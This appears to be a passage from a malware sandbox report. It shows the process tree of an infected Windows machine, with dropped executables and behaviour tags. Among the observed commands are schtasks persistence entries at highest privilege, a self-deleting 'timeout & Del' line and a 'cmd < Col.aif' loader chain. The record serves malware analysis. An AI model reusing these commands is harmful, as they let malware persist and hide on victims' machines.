        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2240,1897259130013550393,12850751418617423583,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2264 /prefetch:2
        10⤵
        
        PID:11224
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2240,1897259130013550393,12850751418617423583,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 /prefetch:3
        10⤵
        
        PID:10728
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2240,1897259130013550393,12850751418617423583,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2752 /prefetch:8
        10⤵
        
        PID:3804
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,1897259130013550393,12850751418617423583,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:1
        10⤵
        
        PID:12128
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,1897259130013550393,12850751418617423583,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3476 /prefetch:1
        10⤵
        
        PID:5112
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2240,1897259130013550393,12850751418617423583,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5560 /prefetch:8
        10⤵
        
        PID:11908
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2240,1897259130013550393,12850751418617423583,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5560 /prefetch:8
        10⤵
        
        PID:12380
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2240,1897259130013550393,12850751418617423583,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4036 /prefetch:8
        10⤵
        
        PID:16064
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2240,1897259130013550393,12850751418617423583,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3348 /prefetch:8
        10⤵
        
        PID:15800
        
        C:\Users\Admin\AppData\Local\Temp\CurrencyCalculatorInstaller.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CurrencyCalculatorInstaller.exe"
        9⤵
        
        PID:4484
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 304
        10⤵
        Program crash
        
        PID:12140
        
        C:\Users\Admin\AppData\Local\Temp\MSI3190.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\MSI3190.tmp"
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3296
    - - C:\Users\Admin\Documents\gRvcl6kklMo5wkZo2pzOuXAV.exe
        
        "C:\Users\Admin\Documents\gRvcl6kklMo5wkZo2pzOuXAV.exe"
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious use of SetWindowsHookEx
        
        PID:5184
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
        6⤵
        Creates scheduled task(s)
        
        PID:5468
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
        6⤵
        Creates scheduled task(s)
        
        PID:4624
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5428
      - C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe
        
        "C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"
        6⤵
        
        PID:588
        
        C:\Users\Admin\Documents\nUDSlwDUHSw2VLlCkK2N9bZQ.exe
        
        "C:\Users\Admin\Documents\nUDSlwDUHSw2VLlCkK2N9bZQ.exe"
        7⤵
        Suspicious use of SetWindowsHookEx
        
        PID:1916
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 284
        8⤵
        Program crash
        
        PID:5044
    - - C:\Users\Admin\Documents\E_5MA2Hw9brEnaU0wQL2T5Zb.exe
        
        "C:\Users\Admin\Documents\E_5MA2Hw9brEnaU0wQL2T5Zb.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:5176
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\E_5MA2Hw9brEnaU0wQL2T5Zb.exe"
        6⤵
        
        PID:3260
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /T 10 /NOBREAK
        7⤵
        Delays execution with timeout.exe
        
        PID:8080
    - - C:\Users\Admin\Documents\Py5oC1Ysh1XrAkVX9HhYrYwe.exe
        
        "C:\Users\Admin\Documents\Py5oC1Ysh1XrAkVX9HhYrYwe.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of SetWindowsHookEx
        
        PID:5168
      - C:\Users\Admin\Documents\Py5oC1Ysh1XrAkVX9HhYrYwe.exe
        
        "C:\Users\Admin\Documents\Py5oC1Ysh1XrAkVX9HhYrYwe.exe"
        6⤵
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:5568
    - - C:\Users\Admin\Documents\rSEDhS1jUcfFdoe97HSJa3cg.exe
        
        "C:\Users\Admin\Documents\rSEDhS1jUcfFdoe97HSJa3cg.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5160
      - C:\Users\Admin\AppData\Roaming\2.exe
        
        "C:\Users\Admin\AppData\Roaming\2.exe"
        6⤵
        Executes dropped EXE
        Suspicious behavior: SetClipboardViewer
        
        PID:1860
      - C:\Users\Admin\AppData\Roaming\1.exe
        
        "C:\Users\Admin\AppData\Roaming\1.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of SetWindowsHookEx
        
        PID:5064
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        7⤵
        
        PID:2784
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 280
        7⤵
        Program crash
        
        PID:6368
    - - C:\Users\Admin\Documents\QU__5Ozc3ACVNYUoYdJj01xh.exe
        
        "C:\Users\Admin\Documents\QU__5Ozc3ACVNYUoYdJj01xh.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5128
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5128 -s 272
        6⤵
        Program crash
        
        PID:1092
    - - C:\Users\Admin\Documents\qt33zyxzMKEumJZDqjdXMFcK.exe
        
        "C:\Users\Admin\Documents\qt33zyxzMKEumJZDqjdXMFcK.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2868
    - - C:\Users\Admin\Documents\W5FhvjC37Q0Te68Egl2YSMn1.exe
        
        "C:\Users\Admin\Documents\W5FhvjC37Q0Te68Egl2YSMn1.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetWindowsHookEx
        
        PID:936
      - C:\Windows\SysWOW64\dllhost.exe
        
        dllhost.exe
        6⤵
        
        PID:5892
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c cmd < Col.aif
        6⤵
        
        PID:5024
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd
        7⤵
        
        PID:3168
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /R "^UhYfGpTuZrzSdFeMeNaCLTnviEufMXMBGeXCcrpOPaOzqZuKoyxOwRoqPBiweDxedSkhHmsZEDNattvoncuHDYmPUWNUViMkYMeiOSrJOcpnrPVKtZDGvNnaaczLMvrvRBxaegxFabToO$" Conquista.aif
        8⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        
        PID:1252
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Mie.exe.com
        
        Mie.exe.com E
        8⤵
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:4152
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Mie.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Mie.exe.com E
        9⤵
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:5656
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Mie.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Mie.exe.com E
        10⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4840
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping localhost
        8⤵
        Runs ping.exe
        
        PID:4704
    - - C:\Users\Admin\Documents\nYWD1Y8Pv6twWZCGOR0yUBHY.exe
        
        "C:\Users\Admin\Documents\nYWD1Y8Pv6twWZCGOR0yUBHY.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:3336
    - - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        "C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4568
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        Executes dropped EXE
        
        PID:3068
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:4648
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:2908
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:5432
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:4284
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:1084
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:6132
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:2232
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 28
        7⤵
        Program crash
        
        PID:6432
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:4224
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:6884
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        
        PID:5360
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:6744
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:3856
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:4388
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:3152
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:6072
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:7916
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:7448
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:4820
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:4312
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:4340
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:6524
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:7652
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:1536
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:6612
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:4788
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:6192
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:7136
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:968
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:7328
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:3628
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:5824
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:1364
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:8284
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:8608
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:7180
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:8664
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:8420
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8420 -s 28
        7⤵
        Program crash
        
        PID:4556
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:8984
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8984 -s 28
        7⤵
        Program crash
        
        PID:5248
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:8440
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:6300
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:9700
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:6944
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:5204
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:9548
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:10808
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:7700
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:7788
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:2996
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:11392
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:11780
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:8100
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:11872
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:11792
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:9472
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:10464
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:8728
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:10860
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:8428
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:12920
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:13052
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:13692
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:11856
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:13328
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:4016
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:9464
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:14900
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:14592
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:988
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:10696
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:6196
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:14368
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:4696
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:6448
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:11420
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:15392
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:15404
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:15640
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:13204
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:14720
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:1620
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:15516
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:12800
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:10748
